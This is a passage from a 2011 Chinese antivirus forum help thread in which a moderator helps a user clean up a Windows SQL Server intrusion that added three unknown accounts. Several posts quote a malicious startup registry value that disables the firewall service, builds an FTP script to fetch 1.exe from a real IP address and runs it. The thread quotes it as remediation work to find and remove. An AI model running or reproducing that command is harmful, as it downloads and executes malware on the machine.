瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 被入侵,被侮辱,出现三个莫名其妙的用户

123   2  /  3  页   跳转

[求助] 被入侵,被侮辱,出现三个莫名其妙的用户

收藏
networkedition
头像
社区嘉宾
  • 帖子:36698
  • 注册: 2008-02-28
  • 来自:
论坛8周年活动礼物09欢乐圣诞10温馨圣诞
发表于: 2011-06-10 09:27 | 短消息 资料
字号: 11楼

回复:被入侵,被侮辱,出现三个莫名其妙的用户

sqlserver建议打全软件补丁,设置强sa密码,修改默认的1433端口。来防范sql入侵。
gototop
 
让18
头像
拙长孩提狮
  • 帖子:44
  • 注册: 2003-12-15
  • 来自:
发表于: 2011-06-10 10:09 | 只看楼主 短消息 资料
字号: 12楼

回复: 被入侵,被侮辱,出现三个莫名其妙的用户



引用:
原帖由 networkedition 于 2011-6-10 9:23:00 发表
c:\windows\system32\isql\c608.exe
c:\windows\downlo~1\bdsrhook.dll
C:\Program Files\Asar\Xafwfiwpg.jpg这个文件瑞星可以查杀。
以上文件找到压缩发来。





昨天晚上捣鼓一晚上,瑞星可能已经把他们干掉了,至少c608.exe我记得肯定杀掉了,刚刚查了一下没有上述文件,又扫描了一下,请大班看一下

附件附件:

下载次数:314
文件类型:application/octet-stream
文件大小:
上传时间:2011-6-10 10:09:07
描述:rar
gototop
 
networkedition
头像
社区嘉宾
  • 帖子:36698
  • 注册: 2008-02-28
  • 来自:
论坛8周年活动礼物09欢乐圣诞10温馨圣诞
发表于: 2011-06-10 10:15 | 短消息 资料
字号: 13楼

回复 12F 让18 的帖子

c:\program files\asar\xafwfiwpg.jpg看一下这个文件还有吗?
启动项目 -- 注册表之如下项删除:
[shell]    <shell><c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 125.46.68.199> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&1.exe&1.exe&del cmd.txt /q /f&exi>
最后编辑networkedition 最后编辑于 2011-06-10 10:17:08
gototop
 
让18
头像
拙长孩提狮
  • 帖子:44
  • 注册: 2003-12-15
  • 来自:
发表于: 2011-06-10 11:29 | 只看楼主 短消息 资料
字号: 14楼

回复 13F networkedition 的帖子

1、c:\program files\asar\xafwfiwpg.jpg    全盘检索没有找到
2、启动项目 -- 注册表之如下项删除:

[shell]    <shell><c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 125.46.68.199> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&1.exe&1.exe&del cmd.txt /q /f&exi>

删除时候显示“无法编辑”
gototop
 
networkedition
头像
社区嘉宾
  • 帖子:36698
  • 注册: 2008-02-28
  • 来自:
论坛8周年活动礼物09欢乐圣诞10温馨圣诞
发表于: 2011-06-10 11:31 | 短消息 资料
字号: 15楼

回复 14F 让18 的帖子

右键属性添加everyone并设置完全控制权限,再删除。
gototop
 
让18
头像
拙长孩提狮
  • 帖子:44
  • 注册: 2003-12-15
  • 来自:
发表于: 2011-06-10 14:53 | 只看楼主 短消息 资料
字号: 16楼

回复 15F networkedition 的帖子

按指示已可以删除:
启动项目 -- 注册表之如下项删除:

[shell]    <shell><c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 125.46.68.199> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&1.exe&1.exe&del cmd.txt /q /f&exi>

但是问题仍存在,表现为:多出来3个用户,用户管理被屏蔽
gototop
 
networkedition
头像
社区嘉宾
  • 帖子:36698
  • 注册: 2008-02-28
  • 来自:
论坛8周年活动礼物09欢乐圣诞10温馨圣诞
发表于: 2011-06-10 14:59 | 短消息 资料
字号: 17楼

回复 16F 让18 的帖子

注册表查看这项:HKEY_LOCAL_MACHINE\SAM,同样需要添加权限才可以。在这里查看是否有那三个多出的用户。
gototop
 
让18
头像
拙长孩提狮
  • 帖子:44
  • 注册: 2003-12-15
  • 来自:
发表于: 2011-06-10 15:46 | 只看楼主 短消息 资料
字号: 18楼

回复: 被入侵,被侮辱,出现三个莫名其妙的用户



引用:
原帖由 networkedition 于 2011-6-10 14:59:00 发表
注册表查看这项:HKEY_LOCAL_MACHINE\SAM,同样需要添加权限才可以。在这里查看是否有那三个多出的用户。



没有,只有这个,看不懂:
gototop
 
让18
头像
拙长孩提狮
  • 帖子:44
  • 注册: 2003-12-15
  • 来自:
发表于: 2011-06-10 15:55 | 只看楼主 短消息 资料
字号: 19楼

回复: 被入侵,被侮辱,出现三个莫名其妙的用户



引用:
原帖由 networkedition 于 2011-6-10 14:59:00 发表
注册表查看这项:HKEY_LOCAL_MACHINE\SAM,同样需要添加权限才可以。在这里查看是否有那三个多出的用户。
gototop
 
networkedition
头像
社区嘉宾
  • 帖子:36698
  • 注册: 2008-02-28
  • 来自:
论坛8周年活动礼物09欢乐圣诞10温馨圣诞
发表于: 2011-06-10 15:57 | 短消息 资料
字号: 20楼

回复 19F 让18 的帖子

将QQ号通过站内短消息发送给我,远程看一下吧。
gototop
 
<<上一主题|下一主题>>
123   2  /  3  页   跳转
页面顶部
Powered by Discuz!NT